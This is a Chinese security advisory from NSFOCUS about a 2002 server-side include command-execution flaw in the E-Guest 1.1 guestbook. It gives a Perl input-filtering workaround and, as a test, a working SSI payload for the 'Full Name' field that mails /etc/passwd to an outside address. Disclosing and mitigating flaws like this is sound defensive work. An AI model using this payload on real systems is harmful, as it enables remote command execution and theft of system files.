首页 -> 安全研究

安全研究

安全漏洞
E-Guest服务器端包含可远程执行任意命令漏洞

发布日期:2002-06-30
更新日期:2002-07-09

受影响系统:

Leung Eric E-Guest 1.1
描述:

BUGTRAQ  ID: 5129

E-Guest是一款免费开放源代码的留言版程序,可使用在Unix和Linux操作系统下。

E-Guest对用户提交到留言本名字的输入缺少正确的过滤,远程攻击者可以利用这个漏洞在目标系统上以E-Guest进程的权限执行任意命令。

E-Guest对用户提交给留言本名字"Full Name"字段的数据缺少正确检查,远程攻击者可以通过服务器端包含来提交SHELL命令,导致攻击者可以以E-Guest进程的权限在系统上执行任意命令。

<*来源:DownBload (downbload@hotmail.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-06/0388.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


DownBload (downbload@hotmail.com)提供了如下测试方法:

Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-
->
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just SSI attack.



建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在E-Guest_sign.pl脚本中增加如下代码进行相关字符过滤:

...
$fullname =~ s/</&lt;/g;
$fullname =~ s/>/&gt;/g;


$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;


$homepage =~ s/</&lt;/g;
$homepage =~ s/>/&gt;/g;


$uin =~ s/</&lt;/g;
$uin =~ s/>/&gt;/g;


$location =~ s/</&lt;/g;
$location =~ s/>/&gt;/g;
...

厂商补丁:

Leung Eric
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://leungeric.com/



浏览次数:4759
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障